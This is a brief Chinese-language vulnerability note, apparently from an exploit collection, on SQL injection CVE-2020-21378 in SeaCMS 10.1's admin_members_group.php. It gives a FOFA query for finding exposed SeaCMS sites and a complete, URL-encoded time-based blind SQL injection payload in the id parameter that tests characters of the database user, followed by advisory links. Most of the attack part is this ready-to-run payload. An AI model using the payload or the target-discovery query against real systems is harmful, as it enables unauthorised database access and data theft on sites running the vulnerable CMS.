SeaCMS SQL注入漏洞（CVE-2020-21378）.md

1.08 KB / 2021-05-21 09:14:38
    # SeaCMS SQL注入漏洞（CVE-2020-21378）


影响版本

SEACMS SeaCMS 10.1(2020.02.08)

fofa：

```
app="海洋CMS"
```

PS：有点鸡肋，需要找到后台入口...还需要登录后才行

SeaCMS 10.1 (2020.02.08)存在SQL注入漏洞。攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。

Payload：

```sql
http://10.2.7.9/5owghc/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
```

ref：

https://github.com/hackxf/cms_vul/blob/master/SeacmsSQL.md

https://nvd.nist.gov/vuln/detail/CVE-2020-21378

https://www.cnvd.org.cn/flaw/show/CNVD-2020-74059